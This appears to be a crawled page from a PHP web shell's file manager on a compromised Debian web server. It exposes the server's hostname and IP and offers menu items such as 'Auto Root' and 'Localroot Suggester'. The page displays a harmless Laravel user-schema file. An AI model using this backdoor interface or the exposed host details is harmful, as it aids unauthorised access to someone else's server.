Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.119
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html_old /
iNetty /
app /
JsonApi /
V1 /
Users /
Delete
Unzip
Name
Size
Permission
Date
Action
Adapter.php
1010
B
-rwxrwxrwx
2022-04-21 13:43
Authorizer.php
2.21
KB
-rwxrwxrwx
2022-04-21 13:43
Schema.php
866
B
-rwxrwxrwx
2022-04-21 13:43
Validators.php
1.98
KB
-rwxrwxrwx
2022-04-21 13:43
Save
Rename
<?php namespace App\JsonApi\V1\Users; use Neomerx\JsonApi\Schema\SchemaProvider; class Schema extends SchemaProvider { /** * @var string */ protected $resourceType = 'users'; /** * @param object $resource * the domain record being serialized. * @return string */ public function getId($resource) { return (string) $resource->getRouteKey(); } /** * @param object $resource * the domain record being serialized. * @return array */ public function getAttributes($resource) { return [ 'name' => $resource->name, 'email' => $resource->email, 'created_at' => optional($resource->created_at)->format("Y-m-d H:i:s"), 'updated_at' => optional($resource->updated_at)->format("Y-m-d H:i:s"), ]; } }